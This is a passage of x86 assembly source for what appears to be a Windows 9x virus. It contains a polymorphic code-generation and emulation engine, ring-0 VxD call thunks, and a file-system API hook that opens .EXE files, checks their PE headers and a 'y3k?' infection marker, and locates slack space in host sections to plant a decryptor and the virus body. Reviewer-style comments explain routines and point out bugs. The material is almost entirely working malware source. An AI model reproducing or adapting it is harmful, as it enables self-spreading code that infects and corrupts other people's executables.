xor edx,edx
mov cl, byte ptr [ebx]
Label36:
inc ebx
mov dl, byte ptr [ebx]
add eax,edx
loop Label36
call Random
lea ebx,[RandomProcs+ebp]
Label37:
inc ebx
mov dl, byte ptr [ebx]
sub eax, edx
jnc Label37
lea eax,[RandomProcs+ebp]
sub ebx,eax
dec ebx
shl ebx,2
inc ebx
mov dl,byte ptr [eax]
add ebx,edx
add ebx,eax
mov ebx,[ebx]
lea ebx,[InstructionData+ebx*8+ebp]
mov [EmulateInstruction+ebp],ebx
call EmuProc
jmp GenerateTrash
; ------------------------------------------------
; ---------------------------- Emulation functions
; ------------------------------------------------
AddInstruction:
add [eax+edx],ecx
ret
SubInstruction:
sub [eax+edx],ecx
ret
MovInstruction:
xor ebx,ebx
mov dword ptr [eax],ebx
mov dword ptr [eax+4],ebx
mov dword ptr [eax+8],ebx
mov dword ptr [eax+12],ebx
mov [eax+edx],ecx
ret
OrInstruction:
or [eax+edx],ecx
ret
XorInstruction:
xor [eax+edx],ecx
ret
AndInstruction:
and [eax+edx],ecx
ret
EmulateInstruction dd 0
ToOperand dd 0
ToType dd 0
FromOperand dd 0
FromTypeOfValue dd 0
EmuProc:
ChangeRegPart:
mov eax,[ToOperand+ebp]
mov ebx,[ToType+ebp]
mov edx,[EmulateInstruction+ebp]
mov edx,[edx+4]
shr ebx,2
inc ebx
call OutputOpcode
dec ebx
shl ebx,2
call UndefineDependentOperands
pushad
mov ebx,[EmulateInstruction+ebp]
mov ebx,[ebx+4]
cmp ebx,Op_mov
jnz Label34
mov eax,[ToOperand+ebp]
mov ebx,[ToType+ebp]
mov ecx,Undefined
call DeleteFromInfo
Label34:
popad
call IsOperandUndefined
jz ChangeOutput
call GetTable
mov ecx,[FromOperand+ebp]
mov edx,[FromTypeOfValue+ebp]
xor ebx,ebx
test edx,edx
jz ValueIsProperlyEmulated_DontNeedThisHack
add ebx,[eax]
ValueIsProperlyEmulated_DontNeedThisHack:
add ebx,[eax+4]
add ebx,[eax+8]
add ebx,[eax+12]
test ebx,ebx
jnz MakeUndefined
YesChangeIt:
mov ebx,[EmulateInstruction+ebp]
mov ebx,[ebx]
add ebx,ebp
call ebx
ChangeOutput:
call GetEqualValue
shr ebx,2
call Output
ret
MakeUndefined:
mov ebx,Undefined
or [eax+InfoPtr],ebx
jmp ChangeOutput
FoundEquals dd 0
ReadFromType dd 0
GetEqualValue:
xor ebx,ebx ; register table
mov [FoundEquals+ebp],ebx
mov [ReadFromType+ebp],ebx
mov ecx,Registers
call CompareOperands
mov ecx,[ToType+ebp]
cmp ecx,4
jae DontTryMemory
mov ecx,MemorySize
mov [ReadFromType+ebp],4
call CompareOperands
DontTryMemory:
push [FromOperand+ebp]
push [FromTypeOfValue+ebp]
mov eax,[FoundEquals+ebp]
inc eax
mov ecx,eax
call Random
imul eax,eax,8
mov ebx,[esp+eax]
mov eax,[esp+eax+4] ; eax = Operand
imul ecx,ecx,8
add esp,ecx
test ebx,ebx
jz Return ;
mov ecx,Writeable
call DeleteFromInfo ; delete writeable from mem
; might still create bugs!!!
; will be fixed in the future
; (the odds a bug will happen
; is extremly low)
ret
CompareOperands:
pop [ReturnAddress+ebp]
inc ecx
CmpLoop:
dec ecx
jnz Label30
jmp [ReturnAddress+ebp]
Label30:
mov eax,ecx
mov ebx,[ReadFromType+ebp]
call ReadOperand
cmp eax,[FromOperand+ebp]
jnz CmpLoop
cmp ebx,[FromTypeOfValue+ebp]
jnz CmpLoop
cmp ecx,[ToOperand+ebp]
jz CmpLoop
push ecx ; Operand
mov ebx,[ReadFromType+ebp] ; Type
add ebx,4
push ebx
inc [FoundEquals+ebp]
jmp CmpLoop
UndefineDependentOperands:
call IsOperandUndefined
jnz Return
pushad
xor ebx,ebx
mov ecx,Registers
call Undefine
mov ebx,4
mov ecx,MemorySize
call Undefine
popad
ret
Undefine:
inc ecx
mov edx,ebx
UndefineLoop:
dec ecx
jz Return
mov eax,ecx
mov ebx,edx
cmp eax,[ToOperand+ebp]
jz UndefineLoop
call ReadOperand
sub ebx,4
cmp ebx,[ToType+ebp]
jnz UndefineLoop
cmp eax,[ToOperand+ebp]
jnz UndefineLoop
push ecx
mov eax,ecx
mov ebx,edx
mov ecx,Undefined
call SetInfo
pop ecx
jmp UndefineLoop
; -----------------------------------------------
; -------------------------- High level functions
; -----------------------------------------------
RandomOperand:
mov eax,3+EndValueFrecuency
shr ebx,2 ; ebx = 0 or 1
sub eax,ebx ; eax = 3 or 2
call Random
xor ebx,ebx
test eax,eax
jz Random ; eax = 1 or 2
dec eax
jz GetReadableReg
sub eax,EndValueFrecuency+1
jz GetReadable
mov eax,[EndValue+ebp]
mov ebx,[EndTypeOfValue+ebp]
and ebx,111b
ret
GetWriteableReg:
call GetWriteableLabel1
test ebx,ebx
jnz GetWriteableReg
ret
; Returns a writeable operand.
; With probability 2/3 (Random mod 3 != 0) a register is forced via
; GetWriteableReg; otherwise any readable operand carrying the Writeable
; attribute is accepted. Out: eax = operand, ebx = 0 (register) or 4 (memory).
; TestInfo returns ZF=1 when the attribute IS set, hence jnz = retry.
GetWriteable:
mov eax,3 ; create more reg then
call Random ; mem
test eax,eax
jnz GetWriteableReg
GetWriteableLabel1:
call GetReadable ; ebx = 4 (reg) or 8 (mem)
mov ecx,Writeable
sub ebx,4 ; -> 0 / 4, the table selector used by GetTable
call TestInfo
jnz GetWriteableLabel1
ret
; GetReadableReg
; Draws from GetReadable until the result is a register (ebx = 4).
; Out: eax = register index (1..Registers), ebx = 4. Unbounded retry loop.
GetReadableReg:
call GetReadable
cmp ebx,4
jnz GetReadableReg
ret
; Returns an operand chosen uniformly over Registers+MemorySize slots.
; Out: ebx = 4, eax = 1..Registers            for a register, or
;      ebx = 8, eax = 0..MemorySize-1         for a memory slot.
; Note the asymmetry: register indices are 1-based (index 0 is unused, see
; RegistersBitValue), memory slots are 0-based. Clobbers ebx only.
GetReadable:
mov ebx,4
mov eax,Registers+MemorySize
call Random
inc eax
cmp eax,Registers+1
jl Return
shl ebx,1
sub eax,Registers+1
ret
; Operand encoding consumed by Output / OutputNotComma below
; (matches the "cmp ebx,1" and "test ebx,1" tests there):
; eax = register index or number
; ebx = 0 = number
; ebx = 1 = register
; ebx = 2 = [number]
; ebx = 3 = [register]
; ------------------------------------------
; ---------------------- Low level functions
; ------------------------------------------
; Random
; In:  eax = modulus (0 = return the raw 32-bit value)
; Out: eax = pseudo-random value, reduced mod eax when the modulus is
;      non-zero (unsigned div). ebx/ecx/edx preserved, flags clobbered.
; State: [RandomNumber+ebp] is xor-updated on every call.
; Note: only cl is loaded from al before "xor ecx,46", so the caller's
; upper ecx bytes leak into the "add eax,ecx" step -- the sequence is not a
; pure function of the seed. This is a simple mixer, not a CSPRNG; the
; fixed constants (14, 46) are part of the engine's signature.
Random:
push ebx
push ecx
push edx
mov ebx,eax
add eax,[RandomNumber+ebp]
mov cl,al
rol eax,cl
add eax,14
xor ecx,46
ror eax,cl
add eax,ecx
xor [RandomNumber+ebp],eax
test ebx,ebx
jz NoMod
xor edx,edx
div ebx
xchg eax,edx ; remainder -> eax
NoMod:
pop edx
pop ecx
pop ebx
ret
; input
; edx = opcode (4-character mnemonic constant such as Op_mov)
; Starts a new 16-byte slot of the textual intermediate code: edi is
; bumped to the NEXT 16-byte boundary (always advances, even if already
; aligned) and the mnemonic is stored byte-swapped so it reads in memory
; in character order. Compile/ReadInstruction1 walks the same 16-byte
; slots and bswaps it back.
OutputOnlyOpcode:
add edi,16
and edi,0fffffff0h
bswap edx
mov [edi],edx
add edi,4
ret
; OutputOpcode
; Emits the mnemonic in edx followed by the first operand (eax/ebx) with no
; leading comma; subsequent operands go through Output.
OutputOpcode:
call OutputOnlyOpcode
jmp OutputNotComma
; Output / OutputNotComma
; In:  eax = register index or 32-bit number, ebx = operand kind:
;      0 number, 1 register, 2 [number], 3 [register] (bit 0 = register,
;      ebx <= 1 = no brackets).
; Text produced: optional '[', then 'R'+digit for a register or 'N' +
; 4 raw bytes for a number, optional ']'. ecx preserved, eax preserved.
Output:
mov byte ptr [edi],','
inc edi
OutputNotComma:
push ecx
xor ecx,ecx
cmp ebx,1
setbe cl
lea ecx,[ecx*8+ecx] ; ecx = 9 (no brackets) or 0 (memory operand)
push ecx
test ecx,ecx
jnz Label10
mov byte ptr [edi],'['
inc edi
Label10:
test ebx,1
setnz cl
shl ecx,2
add ecx,'N' ; 'N' (number) or 'R' (register)
mov byte ptr [edi],cl
inc edi
cmp ecx,'N'
jz OutputNumber
add eax,'0' ; register index as a single ASCII digit
stosb
sub eax,'0'
Label11:
pop ecx
test ecx,ecx
jnz Label12
mov byte ptr [edi],']'
inc edi
Label12:
pop ecx
ret
; OutputNumber
; For a bracketed number the 'N' just written is overwritten with 'S'
; ([edi-1] when ecx = 0), so a memory reference becomes "[S<idx>]" -- the
; variable form that GetOperand in the compiler resolves through
; PointerToDataSlack. For a plain number ecx = 1 puts the 'S' at [edi],
; where the following stosd immediately overwrites it, leaving "N<value>".
OutputNumber:
pop ecx
push ecx
test ecx,ecx
setnz cl
push eax
mov eax,'S'
mov byte ptr [edi+ecx-1],al ; variable
pop eax
stosd
jmp Label11
; GetTable
; In:  eax = 1-based operand index, ebx = table selector (0 or 4)
; Out: CF=0, eax -> 20-byte info entry = [Tables+ebx] + (eax-1)*20
;      CF=1 (and ZF=1) when ebx = 8: memory operands have no info table.
GetTable:
cmp ebx,8
stc
jz Return
dec eax
imul eax,eax,20 ; TableSize
add eax,[Tables+ebx+ebp]
clc
ret
; SetInfo -- OR the attribute bits in ecx into the entry's InfoPtr dword.
; In: eax = operand, ebx = table selector, ecx = attribute mask.
; eax preserved; silently does nothing when GetTable reports no table (CF).
SetInfo:
push eax
call GetTable
jc ReturnPopEax
or [eax+InfoPtr],ecx ; Set attribute
pop eax
ret
; DeleteFromInfo -- clear the attribute bits in ecx (or-then-xor == and-not).
; In: eax = operand, ebx = table selector, ecx = attribute mask. eax preserved.
DeleteFromInfo:
push eax
call GetTable
jc ReturnPopEax
or [eax+InfoPtr],ecx ; Set attribute
xor [eax+InfoPtr],ecx ; Clear it
pop eax
ret
; ChangeInfo -- replace the whole attribute dword with ecx.
; In: eax = operand, ebx = table selector, ecx = new attribute word. eax preserved.
ChangeInfo:
push eax
call GetTable
jc ReturnPopEax
mov [eax+InfoPtr],ecx
pop eax
ret
; IsOperandUndefined
; In:  eax = operand, ebx = table selector
; Out: ZF=1 if the operand carries the Undefined attribute, or if it has no
;      info table at all (GetTable CF path, e.g. ebx = 8); ZF=0 otherwise.
; ecx and eax preserved. Note TestInfo already yields ZF=1 for "bit set".
IsOperandUndefined:
push ecx
mov ecx,Undefined
call TestInfo
pop ecx
jz Return
jc SetZeroFlag ; no-table case: treat as undefined
ret
SetZeroFlag:
cmp eax,eax
ret
; TestInfo
; In:  eax = operand, ebx = table selector, ecx = attribute mask
; Out: ZF=1 when any masked bit is SET (inverted w.r.t. a plain test),
;      CF=0; ecx = 1/0 (set/clear). On no-table: CF=1, ZF=1, eax untouched.
; The lahf/btr/sahf dance rewrites only the ZF bit (bit 6 of ah) of the
; saved flags. "mov ecx,0" rather than xor so the test flags survive.
TestInfo:
push eax
call GetTable
jc ReturnPopEax
test [eax+InfoPtr],ecx
mov ecx,0
setnz cl
lahf
shl cl,6
btr ax,6+8
or ah,cl
sahf
pop eax
clc
ret
; eax = The operand
; ebx
; Which table to read from
; Out: if the operand is undefined (or has no table): eax unchanged,
;      ebx += 4. Otherwise eax = the first non-zero dword found at entry
;      offsets 12, 8, 4 (or the dword at offset 0 if all were zero) and
;      ebx = that offset. ecx preserved.
; The offset doubles as a type code for the callers (CompareOperands,
; Undefine) -- what each slot holds is defined where the tables are
; filled, outside this listing.
ReadOperand:
call IsOperandUndefined
jz OperandIsUndefined
call GetTable
push ecx
xor ebx,ebx
mov ecx,16
FindValueLoop:
sub ecx,4
jecxz Label32
cmp [eax+ecx],ebx ; keep scanning while the slot is zero
jz FindValueLoop
Label32:
mov ebx,ecx
mov eax,[eax+ecx]
pop ecx
ret
OperandIsUndefined:
add ebx,4
ret
; Shared error tail for routines that pushed eax before GetTable:
; restores eax and returns with the flags GetTable left (CF=1, ZF=1).
ReturnPopEax:
pop eax
ret
; GetWhereFrom / GetWhereTo
; Scan the FromWhere / EndWhere dword arrays for the first entry that is
; not -1. Out: eax = that entry, ebx = its byte offset within the array.
; There is no end sentinel: if every entry is -1 the scan runs past the
; array. Clobbers eax, ebx; stack balanced via "add esp,4".
GetWhereFrom:
lea ebx,[FromWhere+ebp-4]
jmp GodDamnedLabelDammit
GetWhereTo:
lea ebx,[EndWhere+ebp-4]
GodDamnedLabelDammit:
push ebx ; remember array base - 4 for the offset computation
xor eax,eax
dec eax ; eax = -1 (the "empty" marker)
GodDamnedLoopDammit:
add ebx,4
cmp eax,[ebx]
jz GodDamnedLoopDammit
mov eax,[ebx]
sub ebx,[esp]
sub ebx,4
add esp,4
ret
; OutputPrefix
; If [Prefix+ebp] is non-zero, emit a "db" slot holding one byte (count 1,
; then the prefix byte) into the textual intermediate code at edi, and
; clear [Prefix]. Format matches DeclareByteProc in the compiler:
; bswapped Op_db, count byte, raw bytes. eax preserved.
OutputPrefix:
push eax
xor eax,eax
cmp eax,[Prefix+ebp]
jz OutputPrefixEnd
add edi,16
and edi,0fffffff0h ; next 16-byte slot (same convention as OutputOnlyOpcode)
mov eax,Op_db
bswap eax
stosd
xor eax,eax
inc eax
stosb ; byte count = 1
xor eax,eax
xchg eax,[Prefix+ebp] ; fetch and clear the pending prefix
stosb
OutputPrefixEnd:
pop eax
ret
; Optimize
; Runs the "do nothing" pass (mov X,X removal) from esi into edi and then
; swaps esi/edi so the caller's esi points at the optimised stream. The
; second pass is disabled (see ClearUnnessesaryInstructions).
Optimize:
call ClearDoNothingInstrucions
; call ClearUnnessesaryInstructions
xchg esi,edi
ret
; Mnemonics the (disabled) ClearUnnessesaryInstructions pass would consider
; removable when their destination is overwritten by a following mov.
MaybeUnnessesaryInstructions:
dd Op_mov, Op_add, Op_sub, Op_and, Op_or, Op_xor
MaybeUnnessesaryInstructionsEnd:
; ClearUnnessesaryInstructions -- DEAD CODE: the only call site (Optimize)
; is commented out. As written it is not usable:
;  * FindNextEntry never advances edi (the "rep scasb" is commented out),
;    so the inner loop only exits if [edi] already equals Op_mov;
;  * there is no zero-slot terminator check, so the outer loop has no end;
;  * the trailing "pop edi / ret" is unreachable (preceded by jmp);
;  * "test ecx,ecx" after repnz scasd also misreads a hit on the last
;    table entry as a miss.
; Left as-is for the record; do not re-enable without rewriting.
ClearUnnessesaryInstructions:
push edi
sub esi,16
ClearUnnessesaryInstructionsLoop:
push edi
add esi,16
and esi,0fffffff0h
lodsd
bswap eax
lea edi,[MaybeUnnessesaryInstructions+ebp]
mov ecx,(MaybeUnnessesaryInstructionsEnd-MaybeUnnessesaryInstructions)/4
repnz scasd
test ecx,ecx
jz DontOptimize2
xor eax,eax
.while (al!=',')
lodsb
.endw
mov edi,esi
mov ecx,1000h
FindNextEntry:
; rep scasb
jecxz DontOptimize2
mov ebx,edi
and edi,0fffffff0h
sub ebx,edi
cmp ebx,4
jz DontOptimize2
mov ebx,Op_mov
cmp [edi],ebx
jnz FindNextEntry
pop edi
jmp ClearUnnessesaryInstructionsLoop
DontOptimize2:
pop edi
and esi,0fffffff0h
mov ecx,16
rep movsb
sub esi,16
jmp ClearUnnessesaryInstructionsLoop
pop edi
ret
; ClearDoNothingInstrucions
; In:  esi = textual intermediate code (16-byte slots), edi = output buffer
; Copies slots from esi to edi, dropping "mov A,A" slots. Equality is
; judged on the first two bytes of each operand (word, skip the ',' byte,
; word), which is exactly a "Rn" register token -- the check is not
; meaningful for 'N'/'S' operands.
; Termination: ecx is used as a "previous slot was empty" flag. A zero
; opcode dword ends the pass only when the preceding copied slot was also
; empty; an isolated zero slot is copied through. Any rep movsb resets
; the flag (ecx becomes 0).
; Out: edi = start of the output (restored), esi = past the input.
ClearDoNothingInstrucions:
push edi
sub esi,16
xor ecx,ecx
OptimizeLoop:
add esi,16
and esi,0fffffff0h
push esi ; start of the current slot
lodsd
test eax,eax
jz OptimizeEnd
bswap eax
cmp eax,Op_mov
jnz DontOptimize
xor eax,eax
lodsw ; first two bytes of operand 1
mov ebx,eax
lodsb ; the ',' (or third byte)
lodsw ; first two bytes of operand 2
cmp ebx,eax
jnz DontOptimize
pop esi ; identical register tokens: drop the slot
jmp OptimizeLoop
DontOptimize:
mov ecx,16
pop esi
rep movsb ; copy the whole slot; leaves ecx = 0
sub esi,16
jmp OptimizeLoop
OptimizeEnd:
test ecx,ecx
jnz OptimizeDoReallyQuit
mov ecx,16
pop esi
rep movsb
sub esi,16
inc ecx ; flag: one empty slot seen
jmp OptimizeLoop
OptimizeDoReallyQuit:
pop eax ; discard the pushed slot pointer
pop edi
ret
; 1. Init block
; offset 0
; pushad
; 2. Make pointer to mem
; 3. Read block
; Encrypt block
; Write block
; popad
; 5. Change mempointer block
; 6. Compare and jump block
; Offsets into the PE header (relative to the "PE\0\0" signature) and
; into a 40-byte section header; names follow the standard PE layout.
PE_Objects equ 6 ; NumberOfSections
PE_NTHdrSize equ 20 ; SizeOfOptionalHeader
PE_Entrypoint equ 40 ; AddressOfEntryPoint (RVA)
PE_ImageBase equ 52
PE_ObjectAlign equ 56 ; SectionAlignment
PE_FileAlign equ 60 ; FileAlignment
PE_ImageSize equ 80 ; SizeOfImage
Obj_Name equ 0
Obj_VirtualSize equ 8
Obj_VirtualOffset equ 12 ; VirtualAddress (RVA)
Obj_PhysicalSize equ 16 ; SizeOfRawData
Obj_PhysicalOffset equ 20 ; PointerToRawData
Obj_Flags equ 36 ; Characteristics
; VxD device id / service ordinals reached through the int 20h thunk at
; CallService (device 0040h = IFSMgr).
IFSMgr equ 0040h
R0_AllocMem equ 000dh
R0_FreeMem equ 000eh
Ring0_FileIO equ 0032h
InstallFileSystemAPIhook equ 0067h
UniToBCSPath equ 0041h
; Entry of the resident (ring-0) copy: the hook installed via
; InstallFileSystemAPIhook lands here and goes straight to FileFunction.
ResidentcodeStart:
jmp FileFunction
; Ring0_FileIO function codes (passed in eax) and IFS hook function
; numbers (read from [ebp+12] in FileFunction).
R0_OPENCREATFILE equ 0D500h ; Open/Create a file
R0_READFILE equ 0D600h ; Read a file, no context
R0_WRITEFILE equ 0D601h ; Write to a file, no context
R0_CLOSEFILE equ 0D700h
IFSFN_FILEATTRIB equ 33
IFSFN_OPEN equ 36
IFSFN_RENAME equ 37
IFSFN_READ equ 0 ; read a file
IFSFN_WRITE equ 1 ; write a file
; Ring-0 service thunks. All of them pop their own return address into
; [ReturnAddr+edi] and return via "jmp [ReturnAddr+edi]", so none is
; reentrant. Register usage as seen from the callers in this file:
;   eax = Ring0_FileIO function, ebx = handle, ecx = byte count,
;   edx = file offset, esi = buffer.
; "vxd" is the generic form: the caller pushes the service arguments and
; then the service ordinal; the ordinal is consumed here, the arguments
; must be removed by the caller afterwards (pop / add esp,N).
FileIOWrite:
mov eax,R0_WRITEFILE
mov ebx,[FileHandle+edi]
pop [ReturnAddr+edi]
push Ring0_FileIO
jmp Label6
FileIOReadDWordToSlack:
mov ecx,4 ; how many bytes
FileIOReadToSlack:
lea esi,[Slack+edi] ; where to place data
FileIORead:
mov eax,R0_READFILE
FileIOHandle:
mov ebx,[FileHandle+edi]
FileIO:
pop [ReturnAddr+edi]
push Ring0_FileIO
jmp Label6
vxd:
pop [ReturnAddr+edi]
Label6:
; Self-modifying VxDCall: rebuild "int 20h / dw service / dw device"
; in place before every call. This is required because Slack (the 4-byte
; read buffer) aliases the first bytes of the thunk below: every
; FileIOReadDWordToSlack overwrites the int 20h opcode and service word.
pop [CallService+edi+2]
mov word ptr [CallService+edi],20cdh
mov word ptr [CallService+edi+4],0040h
jmp CallService
CallService:
Slack:
int 20h
dw 0dh
dw 0040h
jmp [ReturnAddr+edi]
; Resident-copy variables, addressed as [name+edi] with edi = virus base.
; The ZeroRegStart/ZeroRegEnd bracket suggests the region is cleared on
; install (not visible in this listing).
ZeroRegStart:
db 0
FileToInfect db 256 dup (0) ; "x:" + ANSI path built in CheckFilename
TempPtr dd 0 ; scratch ring-0 allocation (compile buffers)
TotalSize dd 0
OldAPIFunction dd 0 ; previous IFS hook, chained to in CallInOurFunction
GuidePos dd 0 ; source + size of the "guide" stub compiled into .text slack
GuideSize dd 0
DecryptorPos dd 0 ; source + size of the decryptor compiled into the last section
DecryptorSize dd 0
HeaderSize dd 0 ; bytes from the PE signature to the end of the headers
VirusInRing0Mem dd 0 ; address of the virus body that gets appended to the host
MemoryTable dd 0 ; MemorySize+1 dwords: VAs of the emulated memory slots
VirtualDataSegment dd 0 ; 4 dwords written into the host's .data slack (see InfectFile)
ReturnAddr dd 0 ; single return slot for the service thunks
ReturnAddr2 dd 0 ; single return slot for GetSegmentSlack
Flag dd 0 ; re-entrancy guard for FileFunction
FileHandle dd 0
PEHeadOfs dd 0 ; e_lfanew of the host
PEHeadStart dd 0 ; ring-0 buffer holding the host's PE header + section table
ObjTable dd 0
CodeObjectPtr dd 0 ; -> ".tex*" section header inside that buffer
DataObjectPtr dd 0 ; -> ".dat*" section header
LastObjectPtr dd 0 ; -> last section header
SlackInCodeSegment dd 0 ; offset within .text where the trailing zero run starts
SlackInDataSegment dd 0 ; offset within .data used for the emulated memory
OldRVA dd 0 ; original AddressOfEntryPoint
StackSave dd 0
NewVirusOffset dd 0
JumpTableMoveOffset dd 0
NewGuideOffset dd 0 ; file offsets of the pieces written to the host
NewDecryptorOffset dd 0
NewDataSegmentOffset dd 0
Unload dd 0 ; 1 = hook passes everything straight through (kill switch)
ZeroRegEnd:
; GetSegmentSlack
; In:  edx = first four bytes of the section name to look for (e.g.
;      'xet.' -> ".tex", which also matches ".text"); [PEHeadStart] = header buffer
; Out: eax = how much free (trailing zero) space the section has
;      ebx = where it is located (offset from the section's raw data start)
;      ecx = pointer to that section's header in the buffer
;      edx = pointer to the last section header
;      eax = 0 and ebx/ecx/edx unspecified when no section matched
; The table is walked from the last section backwards, so the last
; section whose name starts with the 4 bytes wins. Returns through
; [ReturnAddr2+edi] (return address popped on entry), hence not reentrant.
GetSegmentSlack:
pop [ReturnAddr2+edi]
mov eax,[PEHeadStart+edi]
lea ebx,[eax+24]
xor ecx,ecx
mov cx,[eax+PE_NTHdrSize] ; NT hdr size
add ebx,ecx ; ebx -> object table
mov cx,[eax+PE_Objects] ; # objects
imul ecx,ecx,40
add ecx,ebx
push ecx ; push pointer to last object
; + 40
FindCodeSegmentLoop:
sub ecx,8*5
cmp ecx,ebx ; signed compare of two flat pointers
jl DidntFindSegment
cmp dword ptr [ecx],edx ; is code object?
jnz FindCodeSegmentLoop
pop edx ; pop pointer to last object
sub edx,40
mov eax,[ecx+Obj_PhysicalSize] ; size of segment
mov ebx,[ecx+Obj_PhysicalOffset] ; where does segment start
call CalculateFreeSpace
jmp [ReturnAddr2+edi]
DidntFindSegment:
pop eax
xor eax,eax
jmp [ReturnAddr2+edi]
; Scratch state for CalculateFreeSpace (raw size, raw file offset and the
; ring-0 buffer the section is read into).
SegmentSize dd 0
SegmentOffset dd 0
SegmentBuffer dd 0
; CalculateFreeSpace
; In:  eax = section raw size, ebx = section raw file offset
; Out: eax = usable trailing-zero bytes minus a safety margin (can go
;      negative; callers test with jl / test), ebx = offset of that slack
;      from the start of the section's raw data. ecx/edx preserved.
; Reads the whole section into a ring-0 buffer and scans it backwards for
; the first non-zero byte.
; NOTE(review): the backward "repz scasb" starts with ecx = -1 and is not
; bounded by the buffer start -- an all-zero section makes it read below
; the allocation.
; NOTE(review): on allocation failure it jumps to FileFunctionEndAddEsp
; with this routine's return address and the two pushes below still on
; the stack; the register pops at CallInOurFunction then read the wrong
; slots.
CalculateFreeSpace:
push ecx
push edx
mov [SegmentSize+edi],eax
mov [SegmentOffset+edi],ebx
push eax
push R0_AllocMem
call vxd
pop ecx ; remove the size argument (the ordinal was consumed by vxd)
test eax,eax
jz FileFunctionEndAddEsp
mov [SegmentBuffer+edi],eax
mov edx,[SegmentOffset+edi] ; read from
mov esi,eax ; read to
mov ecx,[SegmentSize+edi] ; how much to read
call FileIORead
mov ebx,edi ; edi is needed for scasb; park the virus base in ebx
mov edi,[SegmentBuffer+ebx]
add edi,[SegmentSize+ebx]
sub edi,4 ; edi -> end of segment
push edi ; push end of seg
xor eax,eax
xor ecx,ecx
dec ecx
std
repz scasb ; scan backwards while bytes are zero
cld
dec eax
sub eax,ecx ; eax = bytes scanned (zero run + the stopper)
mov edi,ebx
pop ebx ; end of seg
sub ebx,8 ; decrease some
push eax ; push number of slack bytes
mov eax,[SegmentBuffer+edi]
sub ebx,eax ; ebx = offset of (end-4-8) within the section
push eax
push R0_FreeMem
call vxd
pop eax
pop eax ; eax = slackbytes in codeseg
sub eax,20 ; some safety
sub ebx,eax ; where slack starts
pop edx
pop ecx
ret
; ----------------------------------------
; --------------------------- FileFunction
; ----------------------------------------
; FileFunction -- the IFS API hook body (ring 0).
; Frame: [ebp+12] = IFS function number, [ebp+16] = drive number,
;        [ebp+28] = request block; the path is taken from [[ebp+28]+12]+4
;        (assumed to match the IFS hook prototype -- confirm against the
;        Win9x DDK before relying on these offsets).
; Flow: guard (Unload / Flag) -> build ANSI path -> open -> validate MZ/PE
;       -> find slack in .text and .data -> compile guide + decryptor ->
;       append body to last section -> patch headers -> close -> chain to
;       the previous hook. Every ring-0 helper here uses edi as the base
;       of the resident copy.
; NOTE(review): failures before the handle is saved (L"jnz FileFunctionEnd"
;       after the 'MZ' check) skip R0_CLOSEFILE and leak the handle; the
;       two "jz FileFunctionEndCloseFile" inside the pushad block leave 32
;       bytes of pushad on the stack and never free [PEHeadStart].
; NOTE(review): SectionAlignment / FileAlignment from the host are used as
;       divisors without a zero check (ring-0 divide fault on a hostile file).
FileFunction:
push ebp
mov ebp,esp
push edi
push esi
push ebx
BasePtr:
mov edi,66666666h ; placeholder immediate, presumably patched at install time with the resident base
cmp [Unload+edi],1
jz CallInOurFunction
xor eax,eax
inc eax
cmp [Flag+edi],eax ; already inside the hook (nested IFS call): pass through
jz CallInOurFunction
mov [Flag+edi],eax
mov eax,[ebp+12]
cmp eax,IFSFN_OPEN
jz CheckFilename
cmp eax,IFSFN_FILEATTRIB
jz CheckFilename
cmp eax,IFSFN_RENAME
jnz FileFunctionEnd
CheckFilename:
; Drive number -> "x:" prefix. 0 and 0ffh are rejected (0ffh presumably
; "no drive"/UNC -- confirm); 1..25 map to 'a'..'y', so drive Z: is never
; handled ("cmp eax,25 / ja").
mov eax,[ebp+16]
test eax,eax
jz FileFunctionEnd
cmp eax,0ffh
jz FileFunctionEnd
cmp eax,25
ja FileFunctionEnd
add eax,'a'-1
add eax,':'*256
lea esi,[FileToInfect+edi]
mov word ptr [esi],ax
add esi,2
push 0
push 250 ; output buffer size (FileToInfect is 256 bytes, 2 used by "x:")
mov eax,[ebp+28]
mov eax,[eax+12]
add eax,4
push eax ; Unicode path
push esi ; ANSI output
push UniToBCSPath
call vxd
add esp,16
mov byte ptr [esi+eax],0 ; eax taken as the converted length (assumed)
cmp dword ptr [esi+eax-4],'EXE.' ; case-sensitive ".EXE" suffix check
jne FileFunctionEnd
xor ebx,ebx
cmp dword ptr [esi+1],'OLNU' ; is catalog starting on unlo
setz bl
mov [Unload+edi],ebx ; unload virus then
; Kill switch: a path whose 2nd..5th chars are "UNLO" permanently sets
; Unload, after which the hook passes everything through.
; NOTE(review): the compare below passes only if the first four bytes of
; the path are 'I','N','F',0 -- the opposite of what the comment says, and
; something a normal "\dir\file.EXE" path never satisfies. Looks like a
; leftover test gate or deliberate neutering of the released source.
cmp dword ptr [esi],'FNI' ; dont infect files in win*
jne FileFunctionEnd ; if there is a bug we dont
; to hurt system critical
; files
sub esi,2 ; esi -> "x:\...": full path for the open
mov bx,2
mov cx,0
mov dx,1h
mov eax,R0_OPENCREATFILE
call FileIO
jc FileFunctionEnd
mov [FileHandle+edi],eax
xor edx,edx ; where to read in file
call FileIOReadDWordToSlack
jc FileFunctionEndCloseFile
cmp word ptr [Slack+edi],'ZM'
jnz FileFunctionEnd ; NOTE(review): handle is open here but not closed
mov edx,3ch ; where to read in file
call FileIOReadDWordToSlack
mov edx,[Slack+edi] ; e_lfanew, used unvalidated as the next read offset
mov [PEHeadOfs+edi],edx
call FileIOReadDWordToSlack
cmp word ptr [Slack+edi],'EP'
jnz FileFunctionEndCloseFile
mov edx,[PEHeadOfs+edi]
add edx,84 ; SizeOfHeaders
call FileIOReadDWordToSlack
mov ecx,[Slack+edi] ; size of exehead, pehead and
; objtable
mov edx,[PEHeadOfs+edi]
sub ecx,edx ; size of pehead and objtable
cmp ecx,1000h ; unsigned: also rejects an underflowed (negative) size
ja FileFunctionEndCloseFile
mov [HeaderSize+edi],ecx
lea eax,[ecx+20]
; allocate mem for PEHeader
push eax
push R0_AllocMem
call vxd
pop ecx
test eax,eax
jz FileFunctionEndCloseFile
mov ecx,[HeaderSize+edi]
mov edx,[PEHeadOfs+edi]
mov esi,eax
mov [PEHeadStart+edi],esi
call FileIORead
mov eax,[PEHeadStart+edi]
cmp word ptr [eax],'EP'
jnz FileFunctionEndAddEsp
mov ebx,'y3k?' ; already infected
cmp [eax+12],ebx ; infection marker lives at PE header offset 12
jz FileFunctionEndAddEsp
mov edx,'xet.' ; ".tex" -> matches ".text"
call GetSegmentSlack
; eax = how much free space
; ebx = where it is located
; ecx = pointer to segment object table
; edx = pointer to last object table
cmp eax,[GuideSize+edi] ; guide must fit into the .text zero tail
jl FileFunctionEndAddEsp
mov [CodeObjectPtr+edi],ecx ; save offset of code object
mov [SlackInCodeSegment+edi],ebx
